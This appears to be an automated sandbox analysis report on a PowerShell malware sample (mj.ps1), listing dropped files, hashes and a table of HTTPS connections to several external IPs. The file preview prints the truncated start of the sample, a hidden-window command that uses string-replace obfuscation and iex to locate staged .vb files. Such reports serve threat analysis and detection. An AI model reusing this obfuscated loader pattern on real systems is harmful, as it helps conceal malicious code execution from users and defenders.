                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1d1pqdli.4ow.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hydcv5fl.2ik.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izgh4b5q.nat.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m10v5z2a.mjh.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsdimudu.tef.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rml0xkts.2ho.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrerlwyl.vs3.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6221
                                                                          Entropy (8bit):3.7221055784827666
                                                                          Encrypted:false
                                                                          SSDEEP:96:Va+dCNNZGykvhkvCCt8HYaqcHeeYaqpHe6:VtcNUu8HYFeYe6
                                                                          MD5:C94346A7632B115924765761AC4F6526
                                                                          SHA1:1E82A6F1EE4627729E9D3A204AB72803CDA20734
                                                                          SHA-256:63256025A22B20D26E0C23B318060ABFF67CF18A7C501FC78BFC3EECB87B9D01
                                                                          SHA-512:F51A84AA20A5C68442B4548D52962A4915109F94BA48E6168D696DE5F029B7EA3AAD72F6E6E1301E9E96EE5E7D5F0B22F2931DC4E3BEEB9252038BCE2144C54C
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. ...]...z...$.V..F..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z.... ...F....p..F......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V.Y.L..........................B...A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EW.V.Y.L............................:.R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V.Y.L..............................M.i.c.r.o.s.o.f.t.....V.1.....EW'Y..Windows.@......EW.V.Y.L............................`.W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V.Y.L....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V.Y.L....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V.Y.L................

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZT1B1JAI1C9BV98RUZDF.temp

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6221
                                                                          Entropy (8bit):3.7221055784827666
                                                                          Encrypted:false
                                                                          SSDEEP:96:Va+dCNNZGykvhkvCCt8HYaqcHeeYaqpHe6:VtcNUu8HYFeYe6
                                                                          MD5:C94346A7632B115924765761AC4F6526
                                                                          SHA1:1E82A6F1EE4627729E9D3A204AB72803CDA20734
                                                                          SHA-256:63256025A22B20D26E0C23B318060ABFF67CF18A7C501FC78BFC3EECB87B9D01
                                                                          SHA-512:F51A84AA20A5C68442B4548D52962A4915109F94BA48E6168D696DE5F029B7EA3AAD72F6E6E1301E9E96EE5E7D5F0B22F2931DC4E3BEEB9252038BCE2144C54C
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. ...]...z...$.V..F..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z.... ...F....p..F......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V.Y.L..........................B...A.p.p.D.a.t.a...B.V.1......Y.L..Roaming.@......EW.V.Y.L............................:.R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V.Y.L..............................M.i.c.r.o.s.o.f.t.....V.1.....EW'Y..Windows.@......EW.V.Y.L............................`.W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V.Y.L....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V.Y.L....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V.Y.L................

                                                                          Static File Info

                                                                          General

                                                                          File type:ASCII text, with very long lines (825), with no line terminators
                                                                          Entropy (8bit):5.31863986755126
                                                                          TrID:
                                                                            File name:mj.ps1
                                                                            File size:825 bytes
                                                                            MD5:60d7208fe8e8ac62c560b76fcf8a3bce
                                                                            SHA1:50220e1eed46cd7cce80a8f1e4aaf38619a6f2c7
                                                                            SHA256:42306fd8ea8eea5b9eddb11782f5eb51d69eebfd63da36f2b03d749e649e3939
                                                                            SHA512:c5c72b8cd516eeedf89cc6f2270001651176c11e8513d9fb1a4219a7065ac39fa272ab6f76902901a562befd4f89db84ee7a8fda5f0f9ba6227c5045ea1632cd
                                                                            SSDEEP:24:XVeIZ8hIVIZvjWIFBReaLJmz287CQWAa6KzmtlKS/zo+em:leIzVINKIFBReqmzz7Kzmt4yoi
                                                                            TLSH:5E011205A166D7E34640B59114C25B3E3177D70A60EE44F371F4421725EC6780ED3D3B
                                                                            File Content Preview:powershell -win hidden $xeqoc9=iex($('[Environment]::GetEs3ss'''.Replace('s3s','nvironmentVariable(''public'') + ''\\f170vy.vb')));$flol=iex($('[Environment]::GetEs3ss'''.Replace('s3s','nvironmentVariable(''public'') + ''\\p2q.vb')));function getit([strin

                                                                            File Icon

                                                                            Icon Hash:3270d6baae77db44

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 5, 2024 10:39:26.123281002 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:26.123326063 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:26.123389006 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:26.134675026 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:26.134701014 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:27.571166039 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:27.571259975 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:27.574179888 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:27.574193001 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:27.574438095 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:27.581166029 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:27.627329111 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.299432039 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.299465895 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.299566031 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.299578905 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.350266933 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.402715921 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.402730942 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.402868032 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.402875900 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.444030046 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.496088028 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.496098042 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.496128082 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.496215105 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.496247053 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.529500008 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.529508114 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.529596090 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.529602051 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.554815054 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.554862976 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.554929018 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.554929018 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.554936886 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.599365950 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.599390030 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.599503040 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.599512100 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.599536896 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.647161961 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.682097912 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.682226896 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.682250023 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.682275057 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.682431936 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.682436943 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.697982073 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.698052883 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.698091984 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.698096991 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.698102951 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.698108912 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.698180914 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.716289043 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.716298103 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.716367960 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:28.716372967 CET4434972893.95.216.175192.168.2.11
                                                                            Dec 5, 2024 10:39:28.721088886 CET49728443192.168.2.1193.95.216.175
                                                                            Dec 5, 2024 10:39:29.081373930 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:29.081410885 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:29.081495047 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:29.081760883 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:29.081777096 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:30.536192894 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:30.536428928 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:30.538522959 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:30.538528919 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:30.538794994 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:30.542818069 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:30.583332062 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:30.993503094 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.037827969 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:31.037842035 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.084614992 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:31.113302946 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.113312960 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.113332987 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.113341093 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.113353014 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.113387108 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:31.113394022 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.113439083 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:31.162790060 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:31.213444948 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.213454962 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.213474989 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.213486910 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.213557959 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.213561058 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:31.213577032 CET4434973491.193.42.13192.168.2.11
                                                                            Dec 5, 2024 10:39:31.213660955 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:31.213660955 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:31.213660955 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:31.220335007 CET49734443192.168.2.1191.193.42.13
                                                                            Dec 5, 2024 10:39:33.422503948 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:33.422554970 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:33.422775984 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:33.425164938 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:33.425193071 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:34.694987059 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:34.695049047 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:34.697315931 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:34.697329998 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:34.697597027 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:34.705569029 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:34.751334906 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:35.149703979 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:35.149769068 CET44349748184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:35.149889946 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:35.152149916 CET49748443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:39.335696936 CET49765443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:39.335747004 CET44349765184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:39.335839987 CET49765443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:39.336117029 CET49765443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:39.336133003 CET44349765184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:40.711389065 CET44349765184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:40.720885992 CET49765443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:40.720913887 CET44349765184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:41.171524048 CET44349765184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:41.171606064 CET44349765184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:41.175606012 CET49765443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:41.181631088 CET49765443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:45.432370901 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:45.432401896 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:45.432492018 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:45.432863951 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:45.432878971 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:46.839571953 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:46.839684963 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:46.868912935 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:46.868943930 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:46.869347095 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:46.875905991 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:46.919332981 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:47.380382061 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:47.382793903 CET44349777148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:47.382849932 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:47.383253098 CET49777443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:51.384538889 CET49792443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:51.384562969 CET44349792184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:51.384711981 CET49792443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:51.384867907 CET49792443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:51.384879112 CET44349792184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:52.645436049 CET44349792184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:52.646742105 CET49792443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:52.646750927 CET44349792184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:53.106416941 CET44349792184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:53.106502056 CET44349792184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:39:53.106539965 CET49792443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:53.106935024 CET49792443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:39:57.120358944 CET49806443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:57.120397091 CET44349806148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:57.120553970 CET49806443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:57.120758057 CET49806443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:57.120770931 CET44349806148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:58.519005060 CET44349806148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:58.520168066 CET49806443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:58.520184040 CET44349806148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:59.063574076 CET44349806148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:59.063740969 CET44349806148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:39:59.063823938 CET49806443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:39:59.064109087 CET49806443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:03.075124979 CET49822443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:03.075164080 CET44349822184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:03.075236082 CET49822443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:03.075421095 CET49822443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:03.075434923 CET44349822184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:04.342302084 CET44349822184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:04.343580008 CET49822443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:04.343590021 CET44349822184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:04.802196026 CET44349822184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:04.802269936 CET44349822184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:04.802329063 CET49822443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:04.802777052 CET49822443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:08.806384087 CET49834443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:08.806411028 CET44349834148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:08.806586981 CET49834443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:08.806699038 CET49834443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:08.806718111 CET44349834148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:10.206360102 CET44349834148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:10.207336903 CET49834443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:10.207371950 CET44349834148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:10.753434896 CET44349834148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:10.753622055 CET44349834148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:10.753940105 CET49834443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:10.754333019 CET49834443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:14.775249004 CET49851443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:14.775299072 CET44349851184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:14.775382996 CET49851443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:14.775667906 CET49851443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:14.775677919 CET44349851184.171.244.231192.168.2.11
